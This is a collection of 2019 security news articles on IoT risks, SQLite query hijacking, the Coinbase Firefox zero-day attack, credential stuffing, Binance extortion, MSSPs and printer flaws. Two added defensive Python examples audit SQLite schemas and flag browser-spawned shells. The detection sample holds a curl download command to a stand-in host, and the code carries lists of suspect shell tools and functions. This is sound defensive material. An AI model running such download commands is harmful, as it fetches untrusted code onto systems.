STE WILLIAMS

6 Security Considerations for Wrangling IoT

The Internet of Things isn’t going away, so it’s important to be aware of the technology’s potential pitfalls.

The year 2020 is fast approaching, and studies estimate that more than 10 billion Internet of Things (IoT) devices will be connected by then. As the number of devices continues to grow, we’re putting ourselves at greater security risk. But despite the vulnerabilities, the general public keeps using and purchasing new devices and has come to have blind trust in them.

According to SAM Seamless Networks, security cameras make up nearly half of the most vulnerable devices, followed by smart home devices Google Home and Amazon Alexa. And vulnerabilities are not just in our homes — the enterprise is at risk also.

The Mirai botnet attacks are still being used to damage corporate networks. Recently, a new IoT bricking worm, malware dubbed Silex, has been hitting Linux-based devices, and it’s designed to permanently disable the hardware it infects, effectively rendering the devices useless.

What Makes IoT So Vulnerable?
The sheer increase in the volume of consumer IoT fostered by retail and tech giants has created a massive attack surface. Consumers may have dozens of IoT devices in their homes. And with all of their variations in software, suppliers, and connection points, the possibilities for things to go wrong seem endless.

For instance, turning on your home security system (an IoT device that communicates with a server), driving your car (your phone or car could also be an IoT device), and using a streaming camera at home each seem innocuous on their own, but the data may be tracked by various parties, and combining those data sources opens up alarming possibilities for malicious activity.

To better ensure safety and security, education is needed across the entire IoT ecosystem — from consumers to device manufacturers, service providers, third parties, and developers. Findings show the top reasons for IoT security vulnerabilities include weak passwords, insecure web APIs, cloud and mobile interfaces, insecure third parties, network services, and data transfer to name a few.

What Can Be Done?
Security is only as strong as your weakest link, and we all need to be a bit paranoid in order to get better and for changes to take place. Below are a few considerations to build stronger IoT security:

1. Team mindset: For security to become a priority, it helps to have an entire team that is invested in security. This includes everyone from the CEO and website manager to the developer. When teams and priorities are aligned, budgets and actions are built into short- and long-term goals.

2. Standardization: IoT industry standardization is needed across the board — much like the standards for browsers and websites in the early days of the Internet. Web browsers and websites have evolved a lot over the years, and we are very much in the early stages of IoT.

3. Secure the supply chain: We must hold vendors accountable, but it’s not just about the device itself — supply chain partners are numerous. As we saw with Google Home Nest cameras, third-party service providers were part of the problem that allowed old owners of cameras to spy on new owners.

4. Consumer education: If more people are educated on what could go wrong, they will be more security conscious. If they’re aware of vulnerabilities and issues, they can help prevent attacks. For example, as we saw with the Nest vulnerability, they can make sure their devices are set to factory settings and check for updates to systems on a frequent basis. Educating kids at an early age can also go a long way, just like they’re told to not open the door to strangers. In our modern age, “safety” is still the issue, but the risks have changed. The simple task of installing an application off the Web itself can become the weakest link.

5. Secure applications that support IoT devices: We must ensure that the code and software we build for IoT is continually tested for vulnerabilities. For instance, we can pre-emptively change default passwords of devices, and also manage the patch level of the kernel software on devices to prevent exploitation of new vulnerabilities.

6. Multilayered network security: Many things can be done at the enterprise network level. Segmentation of networks can ensure that hacked IoT devices can’t affect other areas of networks. Perimeter security can help ensure hackers can’t see networks in the first place. Companies should also limit the ability of IoT devices to initiate network connections.

IoT is certainly the Wild West in technology right now, but if we recognize IoT is not going away, and acknowledge its vulnerabilities do create real life safety issues for us, we can raise the awareness, work together across the different layers, and take steps to secure them.


Prabhu Mohan is a software development leader and innovator with over 20 years of product development and execution expertise covering a wide range of technologies and industry verticals spanning from application security and embedded mobile applications used on millions of …

Article source: https://www.darkreading.com/endpoint/6-security-considerations-for-wrangling-iot/a/d-id/1335411?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

SELECT code_execution FROM * USING SQLite: Eggheads lift the lid on DB security hi-jinks

DEF CON At the DEF CON hacking conference in Las Vegas on Saturday, infosec gurus from Check Point are scheduled to describe a technique for exploiting SQLite, a database used in applications across every major desktop and mobile operating system, to gain arbitrary code execution.

In a technical summary provided to The Register ahead of their presentation, Check Point’s Omer Gull sets out how he and his colleague Omri Herscovici developed techniques referred to as Query Hijacking and Query Oriented Programming, in order to execute malicious code on a system. Query Oriented Programming is similar in a way to return oriented programming in that it relies on assembling malicious code from blocks of CPU instructions in a program’s RAM. The difference is that QOP is done with SQL queries.

SQLite is built into all sorts of things, from web browsers to embedded devices to Android, Windows, iOS, various BSDs, and commercial software. An exploitable security hole found in SQLite would therefore be rather bad news because it could open up lots of stuff to potential attack.

It must be stressed, though, that to pull off Check Point’s techniques to hack a given application via SQLite, you need file-system access permissions to alter that app’s SQLite database file, and that isn’t always possible. If you can change a program’s database file, you can probably get, or already have achieved, code execution on the system by some other means anyway.

Nonetheless, it’s a fascinating look into modern methods of code exploitation, and a neat set of discoveries.

Inside the hack

SQLite databases include a master table that describes the database and its objects. One of the fields in the master table is the Data Definition Language, or DDL, that defines the structure of the SQLite database. And because these DDL statements exist as text in a database file, they can be easily replaced if the file is accessible.

Master table DDL statements, Gull explains in the paper, have to begin with the CREATE command. With that limitation in mind, the researchers found that they could change the CREATE command to a CREATE VIEW command and hijack any future queries. CREATE VIEW, essentially, can be used to trap an app’s legit queries and inject extra commands into them.

With the ability to patch the DDL and have it fire off extra subqueries, there’s the opportunity to interact with vulnerable code within SQLite. In other words, it is possible to alter an SQLite database file so that when it is accessed by an application or operating system, the SQL queries the software wanted to run are intercepted, due to CREATE VIEW, and instead, arbitrary queries that exploit holes within SQLite can trigger instead.

Seeing as SQLite is loaded as a library, or statically built in, once you have code execution in SQLite, you can hijack the running program or operating system component.
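The defensive counterpart to the hijack described above, added here as an example and not code from Check Point or the SQLite project: before an application trusts a database file it did not create, it compares the file's sqlite_master entries with the DDL it shipped, flags any extra views or triggers, and refuses DDL that references fts3_tokenizer(). The schema, object names and the load_extension() check are constructed assumptions for the example.

```python
import re
import sqlite3
from typing import Dict, List

# The schema the application expects, keyed by object name. These names and
# statements are constructed for this example; a real application would ship
# its own DDL (or a hash of it) next to the code that opens the file. Write
# each statement in the normalized form SQLite stores in sqlite_master:
# upper-case leading keyword, single spaces, no IF NOT EXISTS.
EXPECTED_SCHEMA: Dict[str, str] = {
    "contacts": "CREATE TABLE contacts(id INTEGER PRIMARY KEY, name TEXT, phone TEXT)",
}

# Functions that have no business appearing in schema DDL. fts3_tokenizer() is
# the one the article's demonstration abused; load_extension() is listed as a
# further obvious red flag (an assumption, not something the article names).
SUSPICIOUS_FUNCS = ("fts3_tokenizer", "load_extension")


def open_untrusted(path: str) -> sqlite3.Connection:
    """Open a database file that may have been tampered with, read-only.

    PRAGMA trusted_schema=OFF (SQLite 3.31.0 and later; older versions ignore
    unknown pragmas) makes SQLite refuse to invoke functions not marked
    innocuous from inside the schema (views, triggers and the like), which
    blunts the kind of hijack described above.
    """
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    conn.execute("PRAGMA trusted_schema=OFF")
    return conn


def audit_schema(conn: sqlite3.Connection) -> List[str]:
    """Compare sqlite_master against EXPECTED_SCHEMA and return the findings.

    An empty list means every expected object exists with exactly the expected
    DDL and nothing else is defined. Selecting from sqlite_master parses the
    schema but does not execute any view or trigger the file defines, so the
    check is safe to run before the application issues its own queries.
    """
    findings: List[str] = []
    rows = conn.execute(
        "SELECT type, name, sql FROM sqlite_master WHERE sql IS NOT NULL"
    ).fetchall()
    seen = set()
    for obj_type, name, sql in rows:
        seen.add(name)
        normalized = " ".join(sql.split())
        expected = EXPECTED_SCHEMA.get(name)
        if expected is None:
            # Extra views and triggers are exactly what a hijacked file adds.
            findings.append(f"unexpected {obj_type} '{name}'")
        elif normalized != expected:
            # Same name, different DDL: e.g. the 'contacts' TABLE replaced by a
            # VIEW so the app's own SELECTs are answered by attacker-chosen SQL.
            findings.append(f"{obj_type} '{name}' has DDL that differs from expected")
        for func in SUSPICIOUS_FUNCS:
            if re.search(rf"\b{func}\s*\(", normalized, re.IGNORECASE):
                findings.append(f"{obj_type} '{name}' references {func}()")
    for name in EXPECTED_SCHEMA:
        if name not in seen:
            findings.append(f"expected object '{name}' is missing")
    return findings


def build_sample_db(tampered: bool) -> sqlite3.Connection:
    """Construct an in-memory database for demonstration.

    With tampered=False the schema is the one the app expects; with
    tampered=True the 'contacts' table has been swapped for a view that
    answers the same queries with rows of the file author's choosing.
    """
    conn = sqlite3.connect(":memory:")
    if tampered:
        conn.execute(
            "CREATE VIEW contacts AS SELECT 1 AS id, 'x' AS name, '000' AS phone"
        )
    else:
        conn.execute(EXPECTED_SCHEMA["contacts"])
    conn.commit()
    return conn


if __name__ == "__main__":
    for label, flag in (("clean", False), ("tampered", True)):
        print(label, audit_schema(build_sample_db(flag)) or "OK")
```

The audit only proves the schema text is unchanged; it does not protect an application that legitimately allows other parties to write its database file.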

Demonstration

Gull and Herscovici chose to focus on Web SQL, an abandoned web API for interacting with client-side databases via a variant of SQL and JavaScript that can still be found in browsers. To demonstrate code execution, they turned to a still-unfixed four-year-old bug, CVE-2015-7036, an untrusted pointer dereference, in SQLite that can be achieved by abusing the fts3_tokenizer() function. Basically, they found it was possible to abuse this function from a hijacked SQL query to defeat ASLR, and hijack the CPU to make it execute arbitrary code.

In another demonstration of the potential of their approach, Gull describes how they replaced the iOS Contacts database, “AddressBook.sqlitedb,” with a malicious version that crashes. Another version could be crafted to potentially achieve code execution within the applications querying the address book, if you’re able to replace the address book SQLite file.

“Contacts, Facetime, Springboard, WhatsApp, Telegram and XPCProxy are just some of the processes querying it,” Gull explains in his paper. “Some of these processes are more privileged than others. Once we proved that we can execute code in the context of the querying process, this technique also allows us to expand and elevate our privileges.”

The findings, he said, were responsibly disclosed to Apple, which assigned CVEs (CVE-2019-8600, CVE-2019-8598, CVE-2019-8602, and CVE-2019-8577) and patched them in May to close the holes. The SQLite team also patched its software in April. App developers should ensure they push a build of their software that includes the updated database code to users in order to protect them.

“Given the fact that SQLite is practically built-in to almost any platform, we think that we’ve barely scratched the tip of the iceberg when it comes to its exploitation potential,” Gull concludes. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/10/memory_corruption_sqlite/

Anatomy of an attack: How Coinbase was targeted with emails booby-trapped with Firefox zero-days

Coinbase chief information security officer Philip Martin this week published an incident report covering the recent attack on the cryptocurrency exchange, revealing a phishing campaign of surprising sophistication.

The thwarted attack began with email messages on May 30 to more than a dozen Coinbase employees that appeared to be from Gregory Harris, a research grant administrator at the University of Cambridge in the UK.

At some point prior to that, the attackers – a group known to Coinbase as CRYPTO-3 or sometimes HYDSEVEN – compromised or created two email accounts at Cambridge. Two days before the initial emails went out, they registered a domain to deliver their exploit, Martin said.

These messages represented reconnaissance for a phishing campaign that extended beyond Coinbase. After corresponding with the initial set of targets – about 200 – through a series of messages over several weeks, the hackers winnowed their list of prospective victims down to five specific marks. These individuals – macOS users not using Firefox – received messages with malicious links.

“Stage one of this attack first identified the operating system and browser, and displayed a convincing error to macOS users who were not currently using Firefox, instructing them to install the latest version from Mozilla,” Martin wrote. “After visiting the page in Firefox, the exploit code was delivered from a separate domain, analyticsfit[.]com, which was registered on May 28.”

The exploit payload used two Firefox zero-day vulnerabilities, a JavaScript privilege escalation flaw (CVE-2019-11707) and a browser sandbox escape (CVE-2019-11708), now patched by Mozilla. According to Martin, the latter vulnerability was discovered simultaneously by Samuel Groß, a security researcher with Google’s Project Zero, and someone in the attack group or someone who provided it to them.

Martin also observed that the privilege escalation flaw had existed for a while in Firefox but only became exploitable using the chosen attack technique as of May 12 due to an unidentified technical change.

“This indicates a very rapid discovery-to-weaponization cycle on the part of the attacker (or whoever the attacker acquired the 0-day from),” said Martin, noting that the exploit code itself was well-structured, as might be expected from experienced malware authors.

Using those two vulnerabilities to achieve arbitrary code execution, the attacker’s shellcode issued a curl command to download and run the stage-one implant, a Netwire variant. Used for reconnaissance and credential theft on victims’ machines, the malicious code was detected by Coinbase at this point based on unusual behavior, specifically Firefox spawning a shell.
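The detection signal Martin names, Firefox spawning a shell, expressed as a process-tree rule over constructed macOS process-creation events. This is an added example, not Coinbase's tooling or report; the JSON field names, the process names treated as "the browser", and the list of suspect child processes are assumptions.

```python
import json
from typing import Dict, Iterable, List, Optional

# Process names as an endpoint agent might report them. These are assumptions
# for this example: Firefox on macOS also runs content processes under another
# name, so both are treated as "the browser".
BROWSER_NAMES = {"firefox", "plugin-container"}
# Children a browser has no business launching. Shells are the signal the
# report names; curl is included because it was the next thing the shell ran.
SUSPECT_CHILDREN = {"sh", "bash", "zsh", "curl", "osascript"}
MAX_ANCESTORS = 4  # how far up the tree to look for a browser ancestor

# Constructed process-creation events, one JSON object per line. Real agents
# use different field names; this shape is an assumption. pids 777/778 mimic
# the chain the report describes; the Terminal chain is a benign control.
SAMPLE_EVENTS = """\
{"ts":"2019-05-30T14:02:11Z","pid":1,"ppid":0,"name":"launchd","cmd":"/sbin/launchd"}
{"ts":"2019-05-30T14:02:12Z","pid":501,"ppid":1,"name":"firefox","cmd":"/Applications/Firefox.app/Contents/MacOS/firefox"}
{"ts":"2019-05-30T14:02:13Z","pid":510,"ppid":501,"name":"plugin-container","cmd":"/Applications/Firefox.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container"}
{"ts":"2019-05-30T14:05:40Z","pid":777,"ppid":510,"name":"sh","cmd":"/bin/sh -c curl -s https://example.invalid/s1 -o /tmp/s1"}
{"ts":"2019-05-30T14:05:41Z","pid":778,"ppid":777,"name":"curl","cmd":"curl -s https://example.invalid/s1 -o /tmp/s1"}
{"ts":"2019-05-30T14:06:00Z","pid":600,"ppid":1,"name":"Terminal","cmd":"/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"ts":"2019-05-30T14:06:01Z","pid":601,"ppid":600,"name":"zsh","cmd":"-zsh"}
{"ts":"2019-05-30T14:06:05Z","pid":602,"ppid":601,"name":"curl","cmd":"curl https://example.invalid/"}
"""


def load_events(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON-lines process events, skipping blank lines."""
    return [json.loads(line) for line in lines if line.strip()]


def browser_ancestor(proc: Dict, procs: Dict[int, Dict]) -> Optional[Dict]:
    """Walk up the parent chain and return the first browser process found.

    The walk stops after MAX_ANCESTORS hops or at an unknown parent. PID reuse
    is ignored here; a production rule would key on a unique process GUID.
    """
    parent = procs.get(proc["ppid"])
    hops = 0
    while parent is not None and hops < MAX_ANCESTORS:
        if parent["name"] in BROWSER_NAMES:
            return parent
        parent = procs.get(parent["ppid"])
        hops += 1
    return None


def detect_browser_spawned_shell(events: List[Dict]) -> List[Dict]:
    """Return one alert per shell or downloader that has a browser ancestor.

    Looking beyond the direct parent catches the curl launched by the shell
    as well as the shell itself, so the download step is visible too.
    """
    procs = {e["pid"]: e for e in events}
    alerts: List[Dict] = []
    for event in events:
        if event["name"] not in SUSPECT_CHILDREN:
            continue
        browser = browser_ancestor(event, procs)
        if browser is not None:
            alerts.append({
                "ts": event["ts"],
                "pid": event["pid"],
                "name": event["name"],
                "via": browser["pid"],
                "cmd": event["cmd"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_browser_spawned_shell(load_events(SAMPLE_EVENTS.splitlines())):
        print(f"ALERT {alert['ts']} pid {alert['pid']} ({alert['name']}) "
              f"under browser pid {alert['via']}: {alert['cmd']}")
```

On the constructed events the rule fires twice, for the shell and for the curl it launched, and stays quiet for the curl typed into Terminal.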

The stage-one payload then transitioned to a stage two implant, identified by Martin as a variant of the Mokes malware family. It’s a remote access trojan (RAT) and was operated under direct human control. Martin speculates that the attackers moved to stage two when they believed they had compromised a target of value.

Once aware of the hack, Coinbase’s security team collected data artifacts related to the break-in, revoked affected credentials, and contacted Mozilla’s security team, which managed to create patches shortly thereafter.

Martin attributed Coinbase’s successful response to the attack to a security-first culture, detection and response tooling, and clear incident response playbooks. Sharing information about such incidents, he suggests, will help the crypto-finance industry. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/coinbase_pwned/

State Farm Reports Credential-Stuffing Attack

The insurer has informed customers a third party used a list of user IDs and passwords to attempt access into online accounts.

US insurance firm State Farm has confirmed a credential-stuffing attack. In a letter to customers, the company reports a so-called “bad actor” used a list of user IDs and passwords obtained from outside sources to attempt to gain access to State Farm online accounts.

As part of the attack, the actor was able to confirm a valid username and password for affected accounts. No sensitive personal information was viewable, State Farm says, and no fraud has been detected. It has reset passwords to block future malicious activity by the same attacker.

In its notification letter, the insurer urges users to change passwords as soon as possible and to reset the password for other accounts that share the same one. Customers are encouraged to monitor their accounts and credit reports for the next one to two years and report suspicious activity to law enforcement, including the Federal Trade Commission and attorney general.

Article source: https://www.darkreading.com/endpoint/state-farm-reports-credential-stuffing-attack/d/d-id/1335487?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Vulnerability Risk Model Promises More-Efficient Security

Taking into account more factors than the current CVSS makes for a better assessment of actual danger.

BLACK HAT USA 2019 – Las Vegas – Vulnerabilities happen. There’s nothing new or mysterious about that. Neither is there mystery around the fact that something must be done to address vulnerabilities. But out of the thousands of Common Vulnerabilities and Exposures (CVEs) discovered each year, which ones should receive a company’s attention? That question — and a data-based answer — were the topic of a talk on Thursday at Black Hat USA.

The session, Predictive Vulnerability Scoring System, was presented by Michael Roytman, chief data scientist at Kenna Security, and Jay Jacobs, a security data scientist at Cyentia Institute. In it, they described vulnerability management as the “wicked problem” because management of vulnerability doesn’t scale to the volume of vulnerabilities.

They pointed to the statistic that about 10% of vulnerabilities are patched each month, a percentage that doesn’t change with the quantity of vulnerabilities exposed. There are too many vulnerabilities for any organization (or collection of organizations) to patch them all, so “we need a strategy to fix what matters.”

The key to the strategy is figuring out “what matters.” In theory, the Common Vulnerability Scoring System (CVSS) should help: The higher the score, the greater the risk. Unfortunately, anything ranked 7 or above is considered critical, and, Roytman and Jacobs said, “CVSS is DoS-ing your patching policy and wasting your money.”

The reason that the researchers say patching for all critical vulnerabilities amounts to a waste is that only 2% to 5% of critical vulnerabilities are ultimately found to be exploited in the wild. For greatest efficiency, then, a scoring system would take into account the factors that make it more likely a vulnerability will be exploited. That system is what the researchers demonstrated from the stage.

The Exploit Prediction Scoring System (EPSS) uses more than a dozen different factors in a model to predict the likelihood that a particular vulnerability will be exploited, and therefore should be given a higher remediation priority. Those factors include things like the CVE, CVSS score, exploits shown in proof-of-concepts, exploits in the wild, and tags for operating systems, vendors, and other variables. The methodology doesn’t require that every factor be entered before a result is generated, but the researchers said that the answer becomes more accurate with each additional factor.

The result is a percentage — the higher the percentage, the more likely it is that the vulnerability will be exploited in the wild, and the more important it is that the vulnerability be patched or remediated quickly.

Roytman and Jacobs said that they will be making their methodology available as both an algorithm that can be configured and implemented by others and as an online calculator into which users can plug in data for an answer on any given CVE. As of the posting of this story, the URL for the calculator (http://kennaresearch.com/tools/epss-calculator) was not yet active, but they said that the page, which will also include the white paper explaining the research that led to the new model, will be available soon after the conclusion of Black Hat.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and …

Article source: https://www.darkreading.com/risk/new-vulnerability-risk-model-promises-more-efficient-security/d/d-id/1335489?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Blackmailed for Bitcoin – exchange rebuffs $3.5m ransom demand

Cryptocurrencies are a big deal once again, now that Bitcoin is back over $10,000.

You might think that’s good news for cryptocurrency exchanges, which are businesses that let you trade regular money, such as Euros, Dollars and Pounds, into and out of so-called virtual currencies like Bitcoin, Monero and Dogecoin.

But it’s not all plain sailing – cryptocurrency companies are of particular interest to cybercrooks, and not only for the cryptocoins they hold.

Here’s a story of super-sized digital blackmail aimed at one of the biggest exchanges out there.

KYC

As you probably know, businesses are supposed to make an effort to know their customers (and their suppliers) these days, as a way of making money laundering more difficult.

And know-your-customer (KYC) rules are particularly important for banks and other businesses, including cryptocoin exchanges, that let people put in money at one end, shuffle it around a bit, or even a lot, and later extract it at the other.

The problem with KYC rules is that they force companies to collect and keep personal data that both you and they would much rather not send across the internet – for example, bills that prove your address, bank statements that vouch for the source of your money, scans of your passport to confirm your identity, and more.

Ironically, the stuff that you’re expected to keep confidential to keep it out of the hands of cybercrooks and to make identity theft harder…

…that’s the very stuff that you now have to share electronically with an ever-increasing number of online businesses, who are forced to demand it just in case you turn out to be a cybercrook yourself.

(If you’ve ever needed to recover a social media account after having your password hacked, you’ve probably, and understandably, had to jump through “prove thyself” hoops that involved sending over the internet exactly the sort of data you wouldn’t usually dream of sending over the internet.)

Collect and store

Now imagine that you’re a cryptocurrency exchange.

Not only do you manage a whole pile of online accounts and cryptocoin wallets (free money!) that cybercrooks would love to get their paws on, you also have a cupboard full of seriously personal data about your customers (free identities!) that the crooks would love just as much.

After all, in the event of a password breach, you can always change your password, and as long as you do it before the crooks get round to trying your old one, you’ve essentially solved the problem.

But it’s much harder to get a new passport, almost impossible to get a new Social Security or National Insurance number, and entirely impossible to get a new birthday.

Give us money or else…

One of the world’s biggest cryptocurrency exchanges, Binance, is currently facing a blackmail saga in connection with alleged KYC data.

Simply put, a crook is claiming to have stolen KYC data on some 10,000 Binance customers, and wants a blackmail payment of BTC 300 (currently about $3,500,000) not to publish it.

It’s kind of like sextortion, where the crooks threaten to reveal personal information about you unless you pay up, except that this time it’s not up to you to pay the money, but up to someone else.

As you probably know, sextortion scams (they get that name because the data they threaten to leak is usually of a sexual or prurient nature) try to convince you that the threat is real by including sample data that “proves” you were hacked, such as a phone number or password.

But sextortion scams are almost always totally bogus – the “proof” comes from an earlier data breach, and that’s all the crooks have got.

The “proof” means nothing, and the rest of the scary story about the sexy data they have on you is made-up.

In Binance’s case the concern isn’t that the photos are of a sexy sort, but of an identificational sort – as you can imagine, they’re not the kind of pics that might embarrass you, but rather the kind that might put you at risk of identity theft.

But do the images really exist in the volume claimed, and did the “proof” samples already seen by Binance really come from a breach at the company?

We won’t pay!

Binance has now publicly stated its opinion that the photos it has seen so far – the “proof” offered by the crooks – did not come from Binance’s KYC data.

The images, says Binance, don’t contain any obvious signs of the digital watermarks that the company claims to add to all the image data it keeps.

Digital watermarks aren’t perfect for proving that a picture didn’t come from you, because proving a negative is almost always very hard.

Nevertheless, even though image files are easily transcoded, adapted, scaled, reprocessed and so on to disguise their true origin, watermarks do provide some sort of guide to the source (or otherwise) of a photo.

That has led Binance to form the opinion that, whether the crooks have as much data as they say or not, it didn’t come from a Binance breach:

When asked to prove the source of the data, the individual demanded 300 BTC and refused to supply irrefutable evidence of their findings. Later, they went to the press under false pretenses, posing as a white hat with good intentions. The relevant law enforcement agencies have been contacted and we will be working closely with them to pursue this person.

Of course, regardless of where the data came from, Binance paying up wouldn’t stop the crooks dumping any data they have anyway.

So the company has taken a different tack, offering to pay someone to expose the crooks, instead of dealing with the crooks themselves:

If you are able to provide any information to help identify this person and allow us to pursue the individual through legal action, we will offer a reward of up to 25 BTC [about $300,000], dependent on the relevance of the data supplied.

What to do?

As Binance has wryly implied, this sort of incident offers other cybercrooks a very believable phishing lure – “Hey, you’re a Binance customer and I just happen to be here to help in these tricky times.”

So the company has warned as follows:

Please be wary of any fraudsters who may impersonate Binance customer service and request you to withdraw your funds.

That’s good advice – and not just for Binance but for all your online accounts.

By the way, digital blackmail attacks like this, such as the sextortion scams we mentioned above, don’t just happen to companies – they can happen to you as an individual, too.

The subject matter may be different – sexy pics rather than KYC data – but the criminality is the same: you’re supposed to send money for the crooks not to do something, even though paying up wouldn’t stop them doing it anyway, and wouldn’t stop them coming back with more threats later.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wjsAyiwmQzo/

So you can’t find enough cyber-security experts to join the team. Time to dial a managed security service provider?

Backgrounder: Managed security services are – by revenue – the fastest expanding field of cyber security, according to IDC, which reckons they should grow at a compound annual growth rate of 14.2 per cent to 2022. Gartner says managed and subscription-based security services will account for half of all cyber-security spending by 2020.

Other than the proliferation of cyber security threats that companies routinely have to combat on a daily basis, there are two major drivers.

One is the continuing global shortage of cyber-security professionals, which makes skilled staff difficult to find and expensive to hire. According to a survey conducted by ESG Group in 2018-2019, 53 per cent of respondents reported a problematic shortage of cyber-security skills, up from 51 per cent in 2017-2018 and 45 per cent in 2016-2017.

As we find it harder to employ security staff, so it becomes practical to outsource cyber-security to those who have managed to snag themselves some experts.

The second driver comes from the need to comply with more stringent data privacy legislation, notably the European Union General Data Protection Regulation (GDPR) that came into force in May 2018. Rather than go it alone, many have put their trust in managed security service providers (MSSPs), who they hope will have the knowledge and experience to help them avoid a costly data breach.

What’s on offer from MSSPs?

Thanks to the rising challenges and growth in cloud-hosting, managed security service providers have evolved to provide a broad range of tools over and above the provision and administration of firewall and intruder detection and prevention systems that defined managed security services (MSS) some years ago. MSSPs routinely deliver a wealth of common security functions that include antivirus and spyware detection, web and email content filtering, endpoint protection, identity access management, virtual private network connectivity, and data encryption, to name just a few. Combinations are bundled into subscriptions that integrate software licenses, hardware rentals and access to management portals.

Patch management and upgrades are staple features of managed security services, along with monitoring and alerting tools for threat detection and weekly security reports. These use data from security logs across networks, devices, applications, and other systems, and they scan for evidence of foiled attacks and proof of suspicious activity from internal and external players. Consulting is also part of the modern mix: identifying security vulnerability and risk assessment using, for example, penetration testing and/or red-team ethical hacking processes to test existing defenses.

What not to expect

And that’s what you get on the tin. Just don’t expect to get everything included as standard.

For example, services like remediation are not always built into your managed security service as standard. Rather, the work of cleaning up identified security threats usually comes as a premium option, something that may be beyond the budget and requirement of the average SMB. In most cases, the MSSP will just inform you if it has discovered some vulnerabilities or if a cyber-attack is imminent or underway. They will then leave you to figure out how best to remediate the threat, often hoping to generate additional business should you need to call upon them as the cavalry.

This can be a bit of cold-water shock. As Gartner noted in its Q2 2019 Magic Quadrant for managed security services, monitoring is one thing, remediation quite another. “For other organisations that have little-to-no security team and a lower security operations maturity, the expectations are that the MSSP will do more than just issue an alert and let the customer fend for itself,” it stated. “They need the MSSP to take an active role in analysing, triaging, and then disrupting or containing the threat, i.e. they need the MSS to act as a first-level incident responder for them.”

Access to qualified security analysts can also be minimal. Skilled staff are at a premium with MSSPs, too, so providers will limit the time they spend on the phone to ensure their precious people are held back to help only the most complex issues. Buyers should therefore check whether their service provision includes access to an actual analyst or if they are limited to automated reports delivered to their inboxes.

Similarly, don’t think that the MSSP’s engineers will come a-knocking when there’s a technical problem. Though this can probably be arranged as part of a supplemental deal, and fee, the advantage of having all those security tools hosted centrally is that the MSSP doesn’t have to leave its own data center to apply patches and upgrades and reconfigure services. Everything can be done through remote access.

How to choose an MSSP

That’s the pitch, and you know what to beware. How, then, should you choose an MSSP?

It’s important to find an MSSP that is flexible enough to offer a customized service that can fit your budget. The thing to understand is that not all of the bigger providers will deliver MSS as a standalone service without requiring parallel spending by you on their accompanying security products. Such services often come courtesy of specialist hardware and software suppliers who have a portfolio of existing security products they want to “add value” to. It’s therefore worth noting that there exists a whole range of other MSSPs. Some of these have converted from generic managed service providers and value-added resellers, and are able to mix and match different services from different providers to offer a more flexible set of options according to scale, performance, and budget.

Product resale constitutes an important part of the revenue stream here, so you need to make a close assessment of where your potential provider is offering something of genuine value, or whether they are simply trying to cut out the middleman so that you take on their products faster.

Having navigated that, what are the characteristics to look for in a managed service?

Ease of use is vital. So look for a provider with a web portal that provides access to threat intelligence and activity reports presented in an easy-to-digest format and that will, ideally, also give assessments of compliance status. The availability of APIs between on- and off-premises tools means MSSPs can feed security monitoring information into other systems and compliance management applications. This is another plus.

Something else to look for is security incident and event management that offers network visibility, email security, threat detection, log management, alerting and compliance reporting under one service. The full package may be too complex and unwieldy for smaller companies, but lighter versions that replicate some of the same functionality will be easier to implement, to manage and to finance.

Not everybody will want or need access to security analysts, but some will like to have the option to occasionally discuss threats with a professional. In that case, make sure your MSSP has sufficient staff expertise, and has a security operations centre that can deliver round-the-clock monitoring and alerting. Make sure that the MSSP’s skills and professed knowledge match your own systems architecture and regulatory obligations and, where needed, are tailored to the compliance requirements of specific verticals, such as finance.

The fine print of any contract will be critical, especially service level agreements that will commit the provider to defined response times to things like applying security patches to systems. It can also be a good idea to integrate some form of cyber-security insurance and make sure both sides understand where their respective responsibilities lie for any data breach, particularly when deciding where sensitive information is stored (by country or legal jurisdiction) and how it is processed.

MSSPs are a growing force in IT. While they are certainly expedient, choosing a supplier wisely is important given the complexity and risks involved. Before you enter any relationship, ensure you have a clear understanding of your own requirements, that you have fully vetted the supplier and that you understand their service offering. Finally, set out the terms of the ongoing relationship. Do all that from the outset, and you will hopefully save yourself headaches down the line.

Supported by SonicWall.


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/08/09/smb_security/

Significant Vulnerabilities Found in 6 Common Printer Brands

In a half-year project, two researchers tested six of the top enterprise printer brands and found vulnerabilities in every device, some of which allow remote execution.

A pair of researchers conducting a six-month survey of popular business printers discovered 49 vulnerabilities in the drivers and software running on the devices. Some of the issues could be remotely exploited to run code on the corporate technology, security firm NCC Group said on August 8.

The research, conducted by NCC researchers Mario Rivas and Daniel Romero, uncovered issues as mild as denial-of-service vulnerabilities and as serious as buffer overflows that could lead to remote code execution. The researchers notified the makers of the affected printers — from Brother, HP, Kyocera, Lexmark, Ricoh and Xerox — of the issues in February, and every manufacturer has patched the issues, NCC stated.

The researchers will walk hackers through their research — including threat modeling and how attackers could use printers to maintain persistence in a corporate network — at the DEF CON hacking conference in Las Vegas this weekend.

“Because printers have been around for so long, they’re not seen as enterprise IoT devices — but they’re embedded in corporate networks and therefore pose a significant risk,” Matt Lewis, research director at NCC Group, said in a statement. “Building security into the development life cycle would mitigate most if not all of these vulnerabilities.”

Printers have long been a target of vulnerability researchers and hackers. At the Black Hat Security Briefings in 2002, two security researchers demonstrated that HP printers could be remotely exploited using security weaknesses in a variety of access methods. In 2017, a graduate thesis presented a survey of the security flaws in printers and multifunction devices, identifying more than 125 printer vulnerabilities in the National Vulnerability Database dating back nearly 20 years.

Increasingly, printers are grouped into the broader class of Internet of Things (IoT) devices that can expose companies to attack.

